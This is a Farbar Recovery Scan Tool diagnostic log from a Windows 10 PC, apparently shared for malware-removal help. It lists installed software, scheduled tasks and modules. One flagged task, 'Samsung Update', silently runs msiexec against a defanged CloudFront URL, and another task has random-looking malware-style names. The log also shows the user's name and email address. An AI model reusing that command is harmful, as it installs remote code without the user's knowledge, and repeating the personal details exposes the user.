Additional scan result of Farbar Recovery Scan Tool (x64) Version: 26-04-2017 Ran by Kinia (26-04-2017 16:03:30) Running from C:\Users\Kinia\Downloads Windows 10 Pro Version 1607 (X64) (2017-01-10 14:48:05) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-685155951-3447365402-3300008554-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-685155951-3447365402-3300008554-503 - Limited - Disabled) Guest (S-1-5-21-685155951-3447365402-3300008554-501 - Limited - Disabled) Kinia (S-1-5-21-685155951-3447365402-3300008554-1001 - Administrator - Enabled) => C:\Users\Kinia ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Kaspersky Anti-Virus (Enabled - Up to date) {86367591-4BE4-AE08-2FD9-7FCB8259CD98} AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Kaspersky Anti-Virus (Enabled - Up to date) {3D579475-6DDE-A186-1569-44B9F9DE8725} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) . . . (Version: 2.1.28.3 - Intel) Hidden . . . (x32 Version: 2.6.2.4 - Intel) Hidden µTorrent (HKU\S-1-5-21-685155951-3447365402-3300008554-1001\...\uTorrent) (Version: 3.4.9.43295 - BitTorrent Inc.) µTorrent (HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\...\uTorrent) (Version: 3.4.9.43295 - BitTorrent Inc.) 9-lab Removal Tool (HKLM-x32\...\9-lab Removal Tool) (Version: - ) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe Illustrator CC 2015 (HKLM-x32\...\{5680D629-B263-49CC-821E-3CEBD4507B51}) (Version: 19.0 - Adobe Systems Incorporated) Adobe InDesign CC 2014 (HKLM-x32\...\{CCDCB9C4-72BA-1014-A3F8-D123F2F18BC2}) (Version: 10.0 - Adobe Systems Incorporated) Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated) Akamai NetSession Interface (HKU\S-1-5-21-685155951-3447365402-3300008554-1001\...\Akamai) (Version: - Akamai Technologies, Inc) Akamai NetSession Interface (HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\...\Akamai) (Version: - Akamai Technologies, Inc) Aktualizacje NVIDIA 2.13.0.21 (Version: 2.13.0.21 - NVIDIA Corporation) Hidden Ansel (Version: 378.66 - NVIDIA Corporation) Hidden Aplikacja na pulpit firmy Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 7.0.5.154 - Autodesk) Autodesk 3ds Max 2017 (HKLM\...\Autodesk 3ds Max 2017) (Version: 19.0.1072.0 - Autodesk) Autodesk 3ds Max 2017 (Version: 19.0.1072.0 - Autodesk) Hidden Autodesk 3ds Max 2017 Populate Data (HKLM\...\{2B07E17E-A072-43BD-9DCC-369B56C16698}) (Version: 19.0.0.0 - Autodesk) Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk) Autodesk Backburner 2017.0 (HKLM-x32\...\{0038F5AA-8482-4BB2-8A28-3FEA1D58D780}) (Version: 17.0.0.0 - Autodesk) Autodesk Civil View for 3ds Max 2017 64-bit (HKLM\...\{1C4FFAF0-7DBB-4F7A-A386-46747D060826}) (Version: 19.0.0.0 - Autodesk) Autodesk Inventor Server Engine for 3ds Max 2017 (HKLM\...\{9167CA34-4E68-49E3-8892-3C439739D2D3}) (Version: 19.0 - Autodesk) Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk) Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk) Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk) Autodesk Material Library Medium Resolution Image Library 2017 (HKLM-x32\...\{CB6E007E-701D-42CD-AF0E-4BE9C36C7F7C}) (Version: 15.11.3.0 - Autodesk) Autodesk Revit Interoperability for 3ds Max 2017 (HKLM\...\Autodesk Revit Interoperability for 3ds Max 2017) (Version: 17.0.411.0 - Autodesk) Autodesk Revit Interoperability for 3ds Max 2017 (Version: 17.0.411.0 - Autodesk) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.25 - Piriform) CGS15_IPM_T2 (x32 Version: 15.0 - Corel Corporation) Hidden Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{65094424-9351-40B8-939B-3676D67E48E0}) (Version: 15.0.0.515 - Corel Corporation) Corel Graphics - Windows Shell Extension (x32 Version: 15.0.515 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Capture (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Common (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Connect (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Custom Data (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - CZ (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Draw (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - EN (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Extra Content (HKLM-x32\...\_{D0291D38-D7AE-47B6-AD64-4FAB908FDB9F}) (Version: - Corel Corporation) CorelDRAW Graphics Suite X5 - Extra Content (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Filters (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - FontNav (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - PHOTO-PAINT (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Photozoom Plugin (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - PL (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Redist (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Setup Files (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - SU (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - SV (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - VBA (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - VideoBrowser (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - VSTA (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - Windows Shell Extension 64 Bit (Version: 15.0.515 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 - WT (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW Graphics Suite X5 (x32 Version: 15.0 - Corel Corporation) Hidden CorelDRAW(R) Graphics Suite X5 (HKLM-x32\...\_{CE54DCE1-E00A-4D91-ACB9-A2D916C24051}) (Version: 15.0.0.488 - Corel Corporation) Dolby Audio X2 Windows API SDK (HKLM\...\{6A478BF2-F67F-4ABC-A7F1-B6B5BA862371}) (Version: 0.5.2.33 - Dolby Laboratories, Inc.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.81 - Google Inc.) Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden Graphics Rules Maker (HKLM-x32\...\Graphics Rules Maker) (Version: 1.1.0 - SimsNetwork.com) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4364 - Intel Corporation) Intel(R) Wireless Bluetooth(R) (HKLM-x32\...\{25FD419A-55A3-4694-BAF3-9C91BB73ECE9}) (Version: 19.30.1649.0949 - Intel Corporation) Intel® Driver Update Utility (HKLM-x32\...\{66307462-7d19-4f1a-af82-aa04b6017f05}) (Version: 2.6.2.4 - Intel) Kaspersky Anti-Virus (HKLM-x32\...\InstallWIX_{E27B1D7B-3B34-43A2-9FC0-9828D5DF46E2}) (Version: 17.0.0.611 - Kaspersky Lab) Kaspersky Anti-Virus (x32 Version: 17.0.0.611 - Kaspersky Lab) Hidden Kaspersky Secure Connection (HKLM-x32\...\InstallWIX_{1CF84962-50F8-48CA-9082-B70F3A02C686}) (Version: 17.0.0.611 - Kaspersky Lab) Kaspersky Secure Connection (x32 Version: 17.0.0.611 - Kaspersky Lab) Hidden Malwarebytes (wersja 3.0.6.1469) (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-685155951-3447365402-3300008554-1001\...\OneDriveSetup.exe) (Version: 17.3.6720.1207 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\...\OneDriveSetup.exe) (Version: 17.3.6720.1207 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61187 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61186 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.7523 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.7523 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{85467CBC-7A39-33C9-8940-D72D9269B84F}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation) NVIDIA GeForce Experience 3.1.2.31 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.1.2.31 - NVIDIA Corporation) NVIDIA mental ray and IRay feature plugins for 3ds Max 2017 (HKLM\...\{6ABEC32F-B90F-4499-B3A3-FF8A00948178}) (Version: 19.0.0.0 - Autodesk) NVIDIA mental ray and IRay rendering plugins for 3ds Max 2017 (HKLM\...\{4B889650-52DC-49E0-AB9C-F501B91002E3}) (Version: 19.0.0.0 - Autodesk) NVIDIA Oprogramowanie systemu PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 378.66 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 378.66 - NVIDIA Corporation) NVIDIA Sterownik graficzny 378.66 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 378.66 - NVIDIA Corporation) NvNodejs (Version: 3.1.2.31 - NVIDIA Corporation) Hidden NvTelemetry (Version: 1.2.0.0 - NVIDIA Corporation) Hidden Oprogramowanie Intel® PROSet/Wireless (HKLM-x32\...\{5853172b-5520-4089-9ef4-e26c594382b3}) (Version: 19.30.0 - Intel Corporation) Origin (HKLM-x32\...\Origin) (Version: 10.4.2.12697 - Electronic Arts, Inc.) Panel sterowania NVIDIA 378.66 (Version: 378.66 - NVIDIA Corporation) Hidden PhotoScape (HKLM-x32\...\PhotoScape) (Version: - ) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7724 - Realtek Semiconductor Corp.) SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.51.0 - SAMSUNG Electronics Co., Ltd.) SHIELD Streaming (Version: 7.1.0340 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 3.1.2.31 - NVIDIA Corporation) Hidden SketchUp 2016 (HKLM\...\{D87EE6DC-32BA-4219-AC75-0A6FD54ED058}) (Version: 16.0.19912 - Trimble Navigation Limited) Tablet Wacom (HKLM\...\Wacom Tablet Driver) (Version: 6.3.21-3 - Wacom Technology Corp.) The Sims 2 Ultimate Collection version 1.17.0.66 (HKLM-x32\...\The Sims 2 Ultimate Collection_is1) (Version: 1.17.0.66 - Mr DJ) V-Ray for SketchUp adv (HKLM-x32\...\V-Ray for SketchUp adv 2.00.26579) (Version: 2.00.26579 - Chaos Software, Ltd) Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.) WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.) WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.) WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.32 of 2015-Jul-21 (Build 1504) (Setup) - WIBU-SYSTEMS AG) Windows Resource Kit Tools - SubInAcl.exe (HKLM-x32\...\{D3EE034D-5B92-4A55-AA02-2E6D0A6A96EE}) (Version: 5.2.3790.1164 - Microsoft Corporation) WinRAR 5.31 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {0550C8FF-E777-41AA-BAF8-AEFF60C55E98} - System32\Tasks\USER_ESRV_SVC_QUEENCREEK => Wscript.exe //B //NoLogo "C:\Program Files\Intel\SUR\QUEENCREEK\task.vbs" Task: {24BCE326-0D85-40EC-BA41-08ADDCCE1CCB} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-10] (NVIDIA Corporation) Task: {29CCD853-D138-404D-8FB9-7878048315BF} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-10] (NVIDIA Corporation) Task: {31B10E56-301D-44C4-8820-236FA3449FE2} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-02-10] (NVIDIA Corporation) Task: {51A7053E-3B28-43B0-974A-3B3BF1391233} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-06] (Piriform Ltd) Task: {59C60756-75AB-45BB-95FF-0775B20636ED} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-10] (NVIDIA Corporation) Task: {6E31B4E0-3F70-4714-8D10-DDBD3F3C5A87} - System32\Tasks\Samsung Update => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=WDCXWD10SPCX-24HWST1_WD-WX11AB55LY405LY40&d=20170420 /q <==== ATTENTION Task: {84CF436F-868B-45ED-B56D-9248E6780973} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2016-03-17] (Intel Corporation) Task: {A8C028F6-93BE-4C56-9F6A-276972227CFE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated) Task: {AC337786-BC02-4FEE-A6FE-B52F3F66761A} - System32\Tasks\Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} => C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe [2016-08-23] (AO Kaspersky Lab) Task: {CCA1D20E-DA6C-4EC3-91A1-0FD4FDF884EB} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-02-10] (NVIDIA Corporation) Task: {D9DEAF20-FD22-4D5C-9FBB-12FE38BCC52C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-26] (Google Inc.) Task: {E368D7EC-4C09-431B-853E-F547E993004A} - System32\Tasks\Prifashnerqagh Helper => C:\Program Files (x86)\Lerjudom\xanermuy.exe Task: {E4E61413-5911-446E-9C71-34E460F870E2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-04-26] (Google Inc.) Task: {F3316F17-633A-426E-9126-35AD3012C474} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-10] (NVIDIA Corporation) Task: {F604FB66-C945-485A-970E-FC2E75D6D78B} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-kiniula0001@wp.pl => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-05-26] (Adobe Systems Incorporated) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) ==================== Shortcuts ============================= (The entries could be listed to be restored or removed.) ==================== Loaded Modules (Whitelisted) ============== 2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll 2017-04-11 20:30 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll 2017-01-10 16:29 - 2017-02-10 00:57 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2015-09-22 21:37 - 2015-09-22 21:37 - 00176640 _____ () C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe 2016-11-17 23:05 - 2016-11-17 23:05 - 00156928 _____ () C:\Program Files\Intel Driver Update Utility\SUR\SurSvc.exe 2017-02-20 13:44 - 2017-02-10 04:33 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-02-20 13:44 - 2017-02-10 04:33 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll 2017-02-20 13:44 - 2017-02-10 04:33 - 00418752 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem\_nvspserviceplugin64.dll 2017-03-16 00:19 - 2017-03-08 23:09 - 01658320 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll 2017-04-11 20:30 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll 2017-01-10 16:54 - 2017-01-10 16:54 - 01678560 _____ () C:\Users\Kinia\AppData\Local\Microsoft\OneDrive\17.3.6720.1207_1\amd64\ClientTelemetry.dll 2017-01-11 01:16 - 2017-01-11 01:16 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 2017-03-14 21:59 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll 2017-01-07 01:30 - 2017-01-07 01:30 - 00402920 _____ () C:\WINDOWS\system32\igfxTray.exe 2017-03-14 22:00 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2017-03-14 22:00 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2017-03-14 22:00 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll 2017-04-11 20:30 - 2017-03-28 07:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll 2017-04-11 20:30 - 2017-03-28 07:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll 2017-04-04 19:21 - 2017-04-04 19:22 - 00019456 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe 2017-04-04 19:21 - 2017-04-04 19:22 - 22723584 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll 2017-04-04 19:21 - 2017-04-04 19:22 - 00448512 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Photos.AGM.Native.Windows.dll 2017-04-04 19:21 - 2017-04-04 19:22 - 05427200 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\MediaEngine.dll 2017-01-07 02:04 - 2017-01-07 02:05 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll 2017-04-04 19:21 - 2017-04-04 19:22 - 00435712 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll 2017-04-04 19:21 - 2017-04-04 19:22 - 01062400 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.Sharing.dll 2017-04-04 19:21 - 2017-04-04 19:22 - 00547840 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_17.313.10010.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.dll 2017-04-26 13:50 - 2017-03-22 10:24 - 02271520 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll 2017-04-26 13:50 - 2017-03-23 19:40 - 02267600 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll 2017-04-26 13:40 - 2017-04-19 07:03 - 03767640 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libglesv2.dll 2017-04-26 13:40 - 2017-04-19 07:03 - 00100696 _____ () C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.81\libegl.dll 2017-04-12 19:44 - 2017-03-10 12:48 - 00061944 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll 2017-04-12 19:44 - 2017-03-10 12:48 - 00110584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll 2016-06-28 00:19 - 2016-06-28 00:19 - 00865232 _____ () C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 17.0.0\kpcengine.2.3.dll 2017-02-20 13:44 - 2017-02-10 04:33 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2017-02-20 13:44 - 2017-02-10 04:33 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll 2017-02-20 13:44 - 2017-02-10 04:33 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll 2017-04-25 11:28 - 2017-04-24 05:07 - 00110592 _____ () c:\programdata\apple\common\cloud\winhelper.dll 2017-02-20 13:44 - 2017-02-10 04:33 - 00506424 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node 2017-02-20 13:44 - 2017-02-10 04:33 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node 2017-02-20 13:44 - 2017-02-10 04:33 - 02809912 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node 2017-02-20 13:44 - 2017-02-10 04:33 - 00245184 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node 2017-02-20 13:44 - 2017-02-10 04:33 - 00436792 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node 2017-02-20 13:44 - 2017-02-10 04:33 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node 2017-02-20 13:44 - 2017-02-10 04:33 - 00968248 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node 2017-04-26 15:59 - 2017-04-26 16:00 - 00380928 _____ () C:\Users\Kinia\Downloads\5711nmwn.exe ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0] ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) ==================== Hosts content: =============================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-07-10 13:04 - 2015-07-10 13:02 - 00000824 ____N C:\WINDOWS\system32\Drivers\etc\hosts ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152625905\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152625983\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg HKU\S-1-5-21-685155951-3447365402-3300008554-1001\Control Panel\Desktop\\Wallpaper -> 